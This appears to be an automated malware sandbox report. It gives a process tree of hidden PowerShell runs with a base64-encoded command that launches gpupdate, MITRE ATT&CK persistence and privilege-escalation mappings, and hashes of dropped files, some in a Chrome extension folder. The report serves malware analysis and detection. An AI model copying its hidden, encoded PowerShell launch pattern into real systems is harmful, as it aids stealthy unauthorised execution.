C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1580
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2680
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2784
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1016
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2620
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2908
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD519cba99a7b06c03faf29ecfec1092a0c
SHA11e505cc0ba85b4911a0202ee680c29ff8b9d9522
SHA2568b678aaac0d2ca72b88c89b7b891147af18c282694476c8a30ef9d90ae1c4938
SHA512bdf36a79c1663e5b786d5ab959aa59da2948ace5e26e2e95ded91876b25b0fbf0dbb52a8e49ba824bb4de3bff23468b321888800d87e4939da6768a2e6fec3fa
-
Filesize
2KB
MD560a5479877274c97281b3698e79e06ce
SHA1f89304b9a93d5df5ac495e39e3c1b523499a3795
SHA256a748b506117941ef75d085a63ac32119ec0674400fcc4ecaf0db6baa699f2e87
SHA512f192ba0555b4d36b1d88f4a7564c499791f4631ccff8a849c68cb9b4271d57b3cf0fb0fc75841d2782123ca1a7a7bd7245d60dee0c0cad7ff2481a8c0076bc58
-
Filesize
2KB
MD599ad7b89eccf14c0ef44c0fb2e608b8a
SHA13b45a0612715d43da0c654795a89c7318e58049b
SHA256403ceb37aaf34a832c4fc7574c1ee8394d3eb32c3e4d82980d6ef48a0244ffec
SHA5128b0acac0fc03d91c2ca521534e7110ecb79ec956dbb05aab5b2a6d43217ab6ecdc5a8f95a72f48cc4c339de39c1b8458fc9e1e703b68e6f64aa6275e1cf615cf
-
Filesize
2KB
MD565447e0422ae9b82a5842b67f960bcbb
SHA1bda0528a4c399064a9249be9bd7a4f886b9724dd
SHA256f9f4b7a2e044c78b5b35ae0f58dbb61c1b52d369bc5baf89d10772f286ac45fb
SHA512490abfe6b72d64d619207de6de4b79cadf4431a050c2ce91e09ea6865fc9ae3d1c48235cf71a4671e129a1069e30e8cd9278713640a60828696c237039f6b705
-
Filesize
2.0MB
MD5b5094d057c3eed6a90c413b35bff8ad8
SHA1f4ca34ba33b5f85882c96deb8b7edcf0acb410ef
SHA2561bd82a5643f2930d246d3880569cccb9ccd72a5b2294c77f94c84f33e9519cf9
SHA512114772518ef4cb1313426bffdee781810deda4c92829d7a7543694f748db85046d7d04cd0bf22d3d180d2bf624c79c3dc426f6354c37212cd4cc5b186641c0f9
-
Filesize
2KB
MD58fbd577c473fbd567358381d8b493f11
SHA15e7e075e0abc1f7b03ece9c45a285684ffe3dee4
SHA256dea2443deb7d080fc760d0259fec1fb835e010b256de0359a570f396cf2beeaa
SHA512ae1ffc82cabb5003d1a2d7f29129771339b53ab8ebf5fc4313c0294df74d91f716ba1254c8f77f986568e8f4f6df110c98e62927e2cae7c137d10ad7cbd1d2a8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5811bce86e458b5bdcdc43c87e572f0b4
SHA1936d267a101a8d7c3f83fbc3228030cd9b3c7657
SHA256f9b3c5914aab9651c5172a100f615abd9a92bd0b03e6871591481c0b99f9f403
SHA51202ccccb4078912e0bca15c463ffe64bebb3e3231aeca80bd4c868333bb725705e4d286d2c57d0bed6e60de2ace8f6159b5b7c6647f7378f6ec88f7411522b994
-
Filesize
5.4MB
MD5eeb3d8066cedc2233dcbe95ffbed6d07
SHA1c50b28431a3fcc9fb75b608743e2377a3e2ac93a
SHA256535ff39fbe7d736c559e27426ee4a0b1ffcf8d313cc70bb5584cefd462dc9f79
SHA512ceecf37bfce7aade01640575db441aadfbc4d00a8baa21bbb8ed2176ade8a821a6bfd9844710e4acce54a53f338cdce96352c55bfab988bda508e97243b91321
-
Filesize
2.1MB
MD5a319e94d4574bf782ce29246be247827
SHA1448f244c0caac5eae2d9eaa9aee38a86c0c81c44
SHA256d7c93a13ccde6989567f7a1ad2a6821a1cccc76fcf6a4ac59f38fc821e549728
SHA512ad9962d2e1e158d887eed92723ac23852701e8199d69cde3ae17aa8f7598749017b6bb6828f5f250f8acd0c8f71da2193c65f2bfb4128619c452efbdf1dbacf9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ce533b9885952b22b20278626189855b
SHA10e7471b16b7a5b1f0b540231728f595d775ccee7
SHA256a055d6498d2fef00bd9f7a044796e4548272ddcad390ed991c4f837e7467f81f
SHA5122712dd1487def619231d644a753bb458a28952594fa9740087c42b0646b5387a93c800aac4973633bff87acf16a9eeab69e2b102420524f14c930c8849bb747a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55b0cd496c7816ea07336559221b81e62
SHA176bc4f40bc894c9441036889a08cf6673bbec55b
SHA2569dff50ff2a41ef7ca0eff96a487412bd781b281e8ceaf08de12d29499c8f7e91
SHA512428871e34d379cd1eb80e4da26ebeaecaa15f33a6867951729fc7e40ba2ac2e369963b825ffd44bcb87d5a8cdacd260319dcf46e04e5995c3ea2ebf6f29b0962
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C7QPIRG2UH53LYFM5XK6.temp
Filesize7KB
MD5ac16034e547cead5fbdcb18624fdd376
SHA15c9ba7875f436a209476eebefa71772eaa461c49
SHA25664137cb6e00cd935290485c345fddd57a8e53e28a4f8a150d6cf32450649a114
SHA5120082b2e58a90fb2aa6a7c06e690ff266a1bbdf26c328565aee26c6c7eda81d7858374aa1e962103205a8cd7347eeca2c966feb55d12132c3c8236cce921c42aa
-
Filesize
6KB
MD535c69811bac9a5de5c837c77b940fc3c
SHA152a563b652e0de24915b91a01bc98ea393e263d6
SHA25617ebbbd0cf6563f775a22c8d025f9b3dd40d03d2e0f6a6021a3d19c565497ac8
SHA51232c7ffe229cca13984e296f25b345a78b53418c851511c69e7f73b9ee813be29f6c2ee433f8ebd3cfe4718a33ed060c1d6810360c86c4aef0b340a3a204079ca
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
6.5MB
MD521e3965bd08eabf0ee24dd9d17dc0d5c
SHA18680d90f50ed3caf0b617a1cf512c664bdbd7be8
SHA256570e0b2d996c3151a08c5042555500988b7eca34c2126d335e06da13ce772f4a
SHA5129b5662e11db22c04c3f4463e493c28b5ef2a7a997e644a6cad8f38d8df2947f8f14b049d0d2136b4e98a53db9db94c5a2ff613b8cdbaa2c7107a46f855c81a3e
-
Filesize
9KB
MD5b36802dffd66eb1d4d0675c6d5c85b5c
SHA11205f08ca83049e05ed7078e2b89c9b79e94d700
SHA2560843eae1066cd0173e286e3a54c1a184088d332f94a01e38cdea615903834cac
SHA5121f88f9c04d328ecb177aedf698da3b54febc8d123352ca60467e9b1c535a5b5c9c35f1ebda08894235e7b56a47589dc99f40b83dc999784eab4a6253a978514e
-
Filesize
5KB
MD5bf1f631d5d6e9168c9e69deb988eeabe
SHA154a1cc608061f3c9b117f3baaf0e09cedb12b45a
SHA256dbd6846ee4d005d54fc33705ae63914a1b7d08f5e1a9a6ed2bbbda0e36af5188
SHA5127610bb27af030ced451aa5107808448fa5d38979e4a198abd12e959daa9c351daa4c0e919d9c356471415ce5392c5a61e000ffdb2bd9ad7c8b7b507b2aea8cfc
-
Filesize
6.3MB
MD5ce1c0101baa6d00f49f74a05b72571d1
SHA16eea622e6c53fb09c4d80a334e18be53e421201e
SHA25664ea16aa26699f8c2c40ec1ae839d5f6ef9bf06c49b6b5e3afc0290e44b53fbf
SHA512478ff60a0a17d5fdd0d34035cda096fca158659fc53ec3f6aa8ac5651286f9a5e570e212f9002963cbeed622861271a8096731332ede6d338a7a0522701c97ea
-
Filesize
6.7MB
MD5a5dca05edc6eda6e2acfe7ca41641cc5
SHA1b772813e63a424ae31a2bd75c0067be03aae0165
SHA256986e2f087fe32332daf7215461a103fa25d86209ab704e29a81dc419435367ae
SHA512c3d865918176c064e638d2c892cb2ef45bc722fa9f3b4e1fb10ca6886054ff2d37cd9fd97fff08cdd95a017374109495bf48069fdc67355b34729fae654da2ed